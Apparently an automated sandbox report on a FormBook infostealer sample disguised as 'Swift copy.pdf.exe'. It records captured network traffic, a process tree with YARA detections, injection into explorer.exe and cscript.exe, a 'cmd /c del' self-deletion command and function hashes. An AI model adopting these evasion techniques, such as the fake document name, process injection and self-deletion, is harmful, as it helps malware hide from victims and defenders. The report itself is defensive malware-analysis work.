                                                                Apr 12, 2021 09:16:22.471978903 CEST6722INData Raw: 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 34 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 75 62 75 6e 74 75 2d 62 2f 75
                                                                Data Ascii: ormat("embedded-opentype"),url("http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff") format("woff"),url("http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2") format("woff2"),url("http://i4.cdn-image.com/__media__/fonts
                                                                Apr 12, 2021 09:16:22.512464046 CEST6723INData Raw: 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 7d 0d 0a 2e 70 6f 70 75 6c 61 72 2d 73 65 61 72 63 68 65 73 7b 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 32 35 70 78 20 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 3a 2f 2f 69
                                                                Data Ascii: n-bottom: 15px}.popular-searches{padding: 40px 25px 5px;background: url(http://i4.cdn-image.com/__media__/pics/12471/kwbg.jpg) no-repeat center center;background-size: cover}.popular-searches ul.first{ list-style: none;width: 380px;margin
                                                                Apr 12, 2021 09:16:22.512500048 CEST6725INData Raw: 69 74 65 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 78 2d 77 69 64 74 68 3a 20 35 30 25 3b 7d 0d 0a 2e 77 65 62 73 69 74 65 20 61 7b 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78
                                                                Data Ascii: ite{float: left;max-width: 50%;}.website a{word-wrap: break-word;font-size: 24px;color: #ffffff;font-family: Arial, Helvetica, sans-serif; display:block;background:url(http://i4.cdn-image.com/__media__/pics/12471/logo.png) no-repeat left cen
                                                                Apr 12, 2021 09:16:22.674876928 CEST6731INData Raw: 77 69 64 74 68 3a 20 32 37 35 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 63 6f 6c 6f 72 3a 20 23
                                                                Data Ascii: width: 275px;-webkit-border-radius:0;-moz-border-radius:0;border-radius:0;color: #ffffff}.srchBtn {background: #22528a url(http://i4.cdn-image.com/__media__/pics/12471/search-icon.png) no-repeat center center; border: none; color: #fff; cu
                                                                Apr 12, 2021 09:16:22.674916983 CEST6732INData Raw: 7d 0d 0a 2e 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 20 39 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 7d 0d 0a 2e 70 6f 70 75 6c 61 72 2d 73 65 61 72 63 68 65 73 20 6c
                                                                Data Ascii: }.main-container{width: 90%!important;padding-bottom: 30px}.popular-searches li {margin-bottom: 0px;margin-top: 15px}div.search-form{width: 300px} .srchTxt{width: 250px;font-size: 16px;line-height: 20px} .website .domain{font-s
                                                                Apr 12, 2021 09:16:22.674937010 CEST6733INData Raw: 78 29 20 7b 0d 0a 20 20 20 20 64 69 76 2e 73 65 61 72 63 68 2d 66 6f 72 6d 7b 77 69 64 74 68 3a 20 32 35 30 70 78 7d 0d 0a 20 20 20 20 2e 77 65 62 73 69 74 65 7b 6d 61 78 2d 77 69 64 74 68 3a 20 39 35 25 3b 7d 0d 0a 20 20 20 20 2e 73 72 63 68 54
                                                                Data Ascii: x) { div.search-form{width: 250px} .website{max-width: 95%;} .srchTxt{width: 200px;font-size: 16px;line-height: 20px} }.content-container{background: none !important}.main-container{border:none !important;height: auto
                                                                Apr 12, 2021 09:16:22.674953938 CEST6735INData Raw: 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 0d 0a 20 20 20 20 61 7b 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0d 0a 3c
                                                                Data Ascii: wrap: break-word;} a{word-wrap: break-word;} </style><![endif]--><script language="JavaScript" type="text/javascript" src="http://i4.cdn-image.com/__media__/js/min.js?v2.2"></script></head><body onload="" onunload="" onBe


                                                                Code Manipulations

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                Analysis Process: Swift copy.pdf.exe PID: 6628 Parent PID: 5964

                                                                General

                                                                Start time:09:14:18
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\Swift copy.pdf.exe'
                                                                Imagebase:0x1c0000
                                                                File size:846848 bytes
                                                                MD5 hash:5946D0EE4BECB515A1CF39EF3F3DDE56
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.352591073.000000000393F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp, Author: Joe Security
                                                                Reputation:low

                                                                Chronological Activities

                                                                Analysis Process: Swift copy.pdf.exe PID: 6896 Parent PID: 6628

                                                                General

                                                                Start time:09:14:28
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Imagebase:0x110000
                                                                File size:846848 bytes
                                                                MD5 hash:5946D0EE4BECB515A1CF39EF3F3DDE56
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low

                                                                Chronological Activities

                                                                Analysis Process: Swift copy.pdf.exe PID: 6904 Parent PID: 6628

                                                                General

                                                                Start time:09:14:29
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                Imagebase:0x500000
                                                                File size:846848 bytes
                                                                MD5 hash:5946D0EE4BECB515A1CF39EF3F3DDE56
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.389888963.0000000000FB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.389845019.0000000000F80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                Chronological Activities

                                                                Analysis Process: explorer.exe PID: 3440 Parent PID: 6904

                                                                General

                                                                Start time:09:14:31
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:
                                                                Imagebase:0x7ff6f22f0000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Chronological Activities

                                                                Analysis Process: autoconv.exe PID: 7136 Parent PID: 3440

                                                                General

                                                                Start time:09:14:45
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\autoconv.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                Imagebase:0xbb0000
                                                                File size:851968 bytes
                                                                MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Chronological Activities

                                                                Analysis Process: cscript.exe PID: 6180 Parent PID: 3440

                                                                General

                                                                Start time:09:14:46
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\cscript.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                Imagebase:0x30000
                                                                File size:143360 bytes
                                                                MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.590975856.00000000000F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:moderate

                                                                Chronological Activities

                                                                Analysis Process: cmd.exe PID: 6248 Parent PID: 6180

                                                                General

                                                                Start time:09:14:49
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/c del 'C:\Users\user\Desktop\Swift copy.pdf.exe'
                                                                Imagebase:0x2a0000
                                                                File size:232960 bytes
                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Chronological Activities

                                                                Analysis Process: conhost.exe PID: 724 Parent PID: 6248

                                                                General

                                                                Start time:09:14:50
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff61de10000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Chronological Activities

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >

                                                                  Analysis Process: Swift copy.pdf.exe PID: 6628 Parent PID: 5964 Swift copy.pdf.exeCOMMON

                                                                  Executed Functions

                                                                  Function 06D2E570, Relevance: 4.0, Strings: 3, Instructions: 260COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: xl$X0$X0
                                                                  • API String ID: 0-2806960145
                                                                  • Opcode ID: d7622c0e41cbce11bdb404e993be958385948427d95d4889bfaa9eaa6abce572
                                                                  • Instruction ID: 3625e05ac6071c2a9a299daabe1969eb7133e6185c54b5d5404700505de24cea
                                                                  • Opcode Fuzzy Hash: d7622c0e41cbce11bdb404e993be958385948427d95d4889bfaa9eaa6abce572
                                                                  • Instruction Fuzzy Hash: 65C16B70D05229CFDB94DFA4D98469DBBB2FF99304F10886AD04AB7344DB359942CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D2C4D0, Relevance: 3.9, Strings: 3, Instructions: 168COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5S$>Mn$>Mn
                                                                  • API String ID: 0-1281832793
                                                                  • Opcode ID: 109b31351d5068128b8b591201b5045fc50b00a97802bfdf96bc000f32bb8c94
                                                                  • Instruction ID: 0eec8b9969577bb69d01c0b873199ec4ede52de81a5820b5b902e118a0baf39a
                                                                  • Opcode Fuzzy Hash: 109b31351d5068128b8b591201b5045fc50b00a97802bfdf96bc000f32bb8c94
                                                                  • Instruction Fuzzy Hash: 727134B4D10219DFCB94CFA5D6946AEBBB2FF98300F20942AE416A7354DB349E41CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D2DC78, Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: g4_$g4_
                                                                  • API String ID: 0-27651551
                                                                  • Opcode ID: 1f387de61f37c28976f44ffa4b7b7855b1c45358055db822eb5380e671593e00
                                                                  • Instruction ID: 54eac2def44bab4376951cd176b1838ec242644b9551d58187b4d92e0d949cef
                                                                  • Opcode Fuzzy Hash: 1f387de61f37c28976f44ffa4b7b7855b1c45358055db822eb5380e671593e00
                                                                  • Instruction Fuzzy Hash: 0B51F270E1075A8BDB58DFA9C9445DDFBB2FF99304F20852AD409AB214EB70A956CF40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D23BBC, Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 06D2DF27
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID: InformationProcessQuery
                                                                  • String ID:
                                                                  • API String ID: 1778838933-0
                                                                  • Opcode ID: 7c45778f5e6bc84caec50a318516ef1794f42c9a7b51c396250c8d21ea25e5e5
                                                                  • Instruction ID: 1fbfbaad4aa6df1aac96b049ed66e8916165d6f67af4c6ce555e586d44ff4466
                                                                  • Opcode Fuzzy Hash: 7c45778f5e6bc84caec50a318516ef1794f42c9a7b51c396250c8d21ea25e5e5
                                                                  • Instruction Fuzzy Hash: 0D21EFB69007599FCB10CF9AD884ADEBBF5FF58314F50842AE958A7300C374A944CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D26A20, Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: wfm
                                                                  • API String ID: 0-2236755615
                                                                  • Opcode ID: d7896f2ca38e07e9694cf6b4b8bd4a383fa1782399f170fb3218e47f26323f59
                                                                  • Instruction ID: bb783e7f88054a22dff67c634c6574bae78d076fea147f5ba06e5233227f45a6
                                                                  • Opcode Fuzzy Hash: d7896f2ca38e07e9694cf6b4b8bd4a383fa1782399f170fb3218e47f26323f59
                                                                  • Instruction Fuzzy Hash: C0D13770E0566ADFCB44CF96C5808AEFBB2FF98304B24C559D416AB218D735EA42CF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D2FAC0, Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %
                                                                  • API String ID: 0-3695413258
                                                                  • Opcode ID: b23a6b685f0569185d27514f85b075f9fb11a30b17754a5f7b2eefe85eefaa29
                                                                  • Instruction ID: 677af04595e16c037da181b1ddec51cad10942455650379b73143aa502709246
                                                                  • Opcode Fuzzy Hash: b23a6b685f0569185d27514f85b075f9fb11a30b17754a5f7b2eefe85eefaa29
                                                                  • Instruction Fuzzy Hash: 24B13570E0422A8FCB44CFE9C9805DEFBF2BF98318F14D96AD414AB254D7349942CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02580006, Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 't
                                                                  • API String ID: 0-649036366
                                                                  • Opcode ID: b6e22130cea3ae707bde7d54fc2b94f364cd6e03274c046927954a4cf9a679f5
                                                                  • Instruction ID: 550ca371f306a1616fc8da1df27a9f530f4fdd97d1928bdc41480ebdbe535ff4
                                                                  • Opcode Fuzzy Hash: b6e22130cea3ae707bde7d54fc2b94f364cd6e03274c046927954a4cf9a679f5
                                                                  • Instruction Fuzzy Hash: A2819C70E0524A8FCB04DFA5C4815EEFFF2AF89310F14D866D444BB295D3B49A86CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D248A0, Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ,cZ
                                                                  • API String ID: 0-1968131880
                                                                  • Opcode ID: 6085b4c1b57f370262edf988906e0a3d3cc649d23af21b860d8cc224c4cf77a6
                                                                  • Instruction ID: f5fd651a3e6d687082821ef93db94e53eb71445a5032cd4dc18516e135dbb3fd
                                                                  • Opcode Fuzzy Hash: 6085b4c1b57f370262edf988906e0a3d3cc649d23af21b860d8cc224c4cf77a6
                                                                  • Instruction Fuzzy Hash: E381D174E002198FDB48CFA9D9846AEFBF2EF99304F20942AD919BB364D7349941CF54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02580040, Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 't
                                                                  • API String ID: 0-649036366
                                                                  • Opcode ID: dc5f4b506129bfd190269d03493144d9aa04aba6e826eb2a7b046806e99f8ac8
                                                                  • Instruction ID: 6c43ac7f079f516e3e191e330c54e9dab97007767db07989a6b66e7d3f3fc2cd
                                                                  • Opcode Fuzzy Hash: dc5f4b506129bfd190269d03493144d9aa04aba6e826eb2a7b046806e99f8ac8
                                                                  • Instruction Fuzzy Hash: 17712870E0520A8FCB04DFA9C5816EEFBF2BB89310F54D825D415B7354D7B49A858FA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D221A8, Relevance: .2, Instructions: 247COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cfb1131054be12783de6d27014f9697570ef71d92816808da885d7a04eb2ff02
                                                                  • Instruction ID: 9c95f07ad61efc711b80b5d666361f3e02b4b5d90be63f4d30f7c8f873cef40e
                                                                  • Opcode Fuzzy Hash: cfb1131054be12783de6d27014f9697570ef71d92816808da885d7a04eb2ff02
                                                                  • Instruction Fuzzy Hash: 4AA12770E0026A8FDB44DFE9C5446DEBBF6BF58318F10C169E418AB245DB709A82CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D24B80, Relevance: .2, Instructions: 246COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53623224d4ddfecc37ad64a43cf32abfe3078d0318d45e25f375defea468c2b8
                                                                  • Instruction ID: f2a4cf978ce2fe203e738b9529ca0a495c7c205179c601fcbc571328400d4427
                                                                  • Opcode Fuzzy Hash: 53623224d4ddfecc37ad64a43cf32abfe3078d0318d45e25f375defea468c2b8
                                                                  • Instruction Fuzzy Hash: 09B13E70E1021ADFDB44DFA8D99099DFBB2FF88704F208A29D515AB354DB34A946CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D21DD8, Relevance: .2, Instructions: 240COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7e351ddaf296e71a73a51e3a5b1fd0a06958447a1d692f12c530ebeaef19ac80
                                                                  • Instruction ID: 3eb31a5acaea5d668f2d7c39351687377d24ae9295ba49163481b97f14d94ded
                                                                  • Opcode Fuzzy Hash: 7e351ddaf296e71a73a51e3a5b1fd0a06958447a1d692f12c530ebeaef19ac80
                                                                  • Instruction Fuzzy Hash: B9A13671E0026A8FDF54DFA6C840BDEBBB6BF99318F10C0A9D518AB204DB715A85CF51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D221A0, Relevance: .2, Instructions: 210COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8fd82e6c98917e0eb9d714201bf846c82d39f334af8e514fec0a0fb79305d73e
                                                                  • Instruction ID: a1b3ded34d35270dafb73874ce64c28eea0bdb62da9a0c0fb08433b17a6f542f
                                                                  • Opcode Fuzzy Hash: 8fd82e6c98917e0eb9d714201bf846c82d39f334af8e514fec0a0fb79305d73e
                                                                  • Instruction Fuzzy Hash: 3E81F671E0026A8FDB44DFE9C5446DEBBF2AF58318F10C129E418AB345EB749A86CF51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02583C68, Relevance: .2, Instructions: 193COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8a04f1fc456efcb56025e4d8cc965cd5ce6ee4f2f9cdfeb30907603421e6a32c
                                                                  • Instruction ID: e47bd228ace9fd18d0d2791c20d10dfe4fd3b60e1941219abf55d373f5d59a5a
                                                                  • Opcode Fuzzy Hash: 8a04f1fc456efcb56025e4d8cc965cd5ce6ee4f2f9cdfeb30907603421e6a32c
                                                                  • Instruction Fuzzy Hash: 35814771E0562ACBDB28DF66C8407DAB7B2BF89300F10D5EAD509B7244EBB05A85CF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D25140, Relevance: .2, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba351805ee2eb726cd406f3763dd109f344b69d2865c2a858255f9d8960c0abb
                                                                  • Instruction ID: 9c6191ac39224ce724f1bbd6c1f917e8123a32374e946bd9d3b2715439884022
                                                                  • Opcode Fuzzy Hash: ba351805ee2eb726cd406f3763dd109f344b69d2865c2a858255f9d8960c0abb
                                                                  • Instruction Fuzzy Hash: C6615870E1421ACFEB49CFA6D9449AEFBF2FF88200F14D46AC409A7294D7348A41CF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D25133, Relevance: .2, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a94363f68b97346eaab76d9db56f3be232cc4ff1f67d937d791c47e5afd450e4
                                                                  • Instruction ID: d6d79af4e5e3552b87b7de68a6b7d1c90437fe120438578a24937e7f7377a33b
                                                                  • Opcode Fuzzy Hash: a94363f68b97346eaab76d9db56f3be232cc4ff1f67d937d791c47e5afd450e4
                                                                  • Instruction Fuzzy Hash: 97616C70E0421A8FEB49CFA6D5449AEFBF2EF99204F14D46AC015A7294D7348A41CF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 06D250F3, Relevance: .2, Instructions: 158COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.361426950.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 87b2c49c3f585175b15d93e495ef43e07d19044866bf1069328bcb4a8feaa7b7
                                                                  • Instruction ID: d4270e50baef2097b4bc84ea3033c2c76993b40fe0189e49d9ca01c51b518b23
                                                                  • Opcode Fuzzy Hash: 87b2c49c3f585175b15d93e495ef43e07d19044866bf1069328bcb4a8feaa7b7
                                                                  • Instruction Fuzzy Hash: F8519070E0421ACFDB49CFA6D5449AEFBF2EFD9204F14D4AAC015A7294D7348A42CF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02583E8B, Relevance: .1, Instructions: 142COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.351054423.0000000002580000.00000040.00000001.sdmp, Offset: 02580000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a668c2858c01ba2e9952bb9b0cf73017e172f19590017fdecc7d8d0174eddfde
                                                                  • Instruction ID: ee32f61909c57823595febc9c0ab9a0e88db0f6d9222e5685af9af17c298922a
                                                                  • Opcode Fuzzy Hash: a668c2858c01ba2e9952bb9b0cf73017e172f19590017fdecc7d8d0174eddfde
                                                                  • Instruction Fuzzy Hash: DC51237594122ADFDB64DF25C840BEDB7B2BB89300F108AEAD509B6250EBB05AC5CF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02583EFA, Relevance: .1, Instructions: 129COMMON
